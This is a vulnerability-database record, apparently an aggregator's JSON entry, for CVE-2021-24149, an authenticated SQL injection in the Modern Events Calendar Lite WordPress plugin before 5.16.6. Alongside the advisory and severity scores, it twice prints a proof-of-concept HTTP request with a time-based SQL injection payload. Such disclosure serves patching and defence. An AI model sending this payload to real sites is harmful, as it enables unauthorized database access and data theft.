The plugin did not sanitise the mec[post_id] POST parameter in the mec_fes_form AJAX action when logged in as an author+, leading to an authenticated SQL Injection issue. If the Frontend Event Submission form is embed in a public page, then it could lead to any authenticated user, like subscribers to perform such SQL Injection.
{"id": "WPEX-ID:26819680-22A8-4348-B63D-DC52C0D50ED0", "type": "wpexploit", "bulletinFamily": "exploit", "title": "Modern Events Calendar Lite < 5.16.6 - Authenticated SQL Injection", "description": "The plugin did not sanitise the mec[post_id] POST parameter in the mec_fes_form AJAX action when logged in as an author+, leading to an authenticated SQL Injection issue. If the Frontend Event Submission form is embed in a public page, then it could lead to any authenticated user, like subscribers to perform such SQL Injection.\n", "published": "2021-01-29T00:00:00", "modified": "2021-01-31T06:01:32", "cvss": {"score": 0.0, "vector": "NONE"}, "href": "", "reporter": "khanh", "references": [], "cvelist": ["CVE-2021-24149"], "lastseen": "2021-02-15T22:28:49", "viewCount": 84, "enchantments": {"dependencies": {"references": [{"type": "cve", "idList": ["CVE-2021-24149"]}, {"type": "wpvulndb", "idList": ["WPVDB-ID:26819680-22A8-4348-B63D-DC52C0D50ED0"]}], "rev": 4}, "score": {"value": 4.6, "vector": "NONE"}, "backreferences": {"references": [{"type": "cve", "idList": ["CVE-2021-24149"]}, {"type": "wpvulndb", "idList": ["WPVDB-ID:26819680-22A8-4348-B63D-DC52C0D50ED0"]}]}, "exploitation": null, "vulnersScore": 4.6}, "sourceData": "https://drive.google.com/file/d/1-2tvODEzr1zLb8CmIGmODe5470_YHsqX/view?usp=sharing\r\n\r\nPOST /wp-admin/admin-ajax.php HTTP/1.1\r\nHost: example.com\r\nUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:84.0) Gecko/20100101 Firefox/84.0\r\nAccept: application/json, text/javascript, */*; q=0.01\r\nAccept-Language: en-GB,en;q=0.5\r\nAccept-Encoding: gzip, deflate\r\nReferer: https://example.com/wordpress-5.5/wp-admin/post.php?post=407&action=edit\r\nContent-Type: application/x-www-form-urlencoded; charset=UTF-8\r\nX-Requested-With: XMLHttpRequest\r\nContent-Length: 73\r\nConnection: close\r\nCookie: [author+ cookies]\r\n\r\naction=mec_fes_form&mec%5bpost_id%5d=1+or+sleep(1)%23&_wpnonce=212479b1e1", "generation": 1, "immutableFields": [], "cvss2": {}, "cvss3": {}, "_state": {"dependencies": 1646140258}}
{"cve": [{"lastseen": "2022-03-23T14:47:53", "description": "Unvalidated input in the Modern Events Calendar Lite WordPress plugin, versions before 5.16.6, did not sanitise the mec[post_id] POST parameter in the mec_fes_form AJAX action when logged in as an author+, leading to an authenticated SQL Injection issue.", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-03-18T15:15:00", "type": "cve", "title": "CVE-2021-24149", "cwe": ["CWE-89"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.5, "vectorString": "AV:N/AC:L/Au:S/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-24149"], "modified": "2021-03-23T17:51:00", "cpe": [], "id": "CVE-2021-24149", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2021-24149", "cvss": {"score": 6.5, "vector": "AV:N/AC:L/Au:S/C:P/I:P/A:P"}, "cpe23": []}], "wpvulndb": [{"lastseen": "2021-02-15T22:28:49", "bulletinFamily": "software", "cvelist": ["CVE-2021-24149"], "description": "The plugin did not sanitise the mec[post_id] POST parameter in the mec_fes_form AJAX action when logged in as an author+, leading to an authenticated SQL Injection issue. If the Frontend Event Submission form is embed in a public page, then it could lead to any authenticated user, like subscribers to perform such SQL Injection.\n\n### PoC\n\nhttps://drive.google.com/file/d/1-2tvODEzr1zLb8CmIGmODe5470_YHsqX/view?usp=sharing POST /wp-admin/admin-ajax.php HTTP/1.1 Host: example.com User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:84.0) Gecko/20100101 Firefox/84.0 Accept: application/json, text/javascript, */*; q=0.01 Accept-Language: en-GB,en;q=0.5 Accept-Encoding: gzip, deflate Referer: https://example.com/wordpress-5.5/wp-admin/post.php?post=407&action;=edit Content-Type: application/x-www-form-urlencoded; charset=UTF-8 X-Requested-With: XMLHttpRequest Content-Length: 73 Connection: close Cookie: [author+ cookies] action=mec_fes_form&mec;%5bpost_id%5d=1+or+sleep(1)%23&_wpnonce=212479b1e1\n", "modified": "2021-01-31T06:01:32", "published": "2021-01-29T00:00:00", "id": "WPVDB-ID:26819680-22A8-4348-B63D-DC52C0D50ED0", "href": "https://wpscan.com/vulnerability/26819680-22a8-4348-b63d-dc52c0d50ed0", "type": "wpvulndb", "title": "Modern Events Calendar Lite < 5.16.6 - Authenticated SQL Injection", "sourceData": "", "cvss": {"score": 0.0, "vector": "NONE"}}]}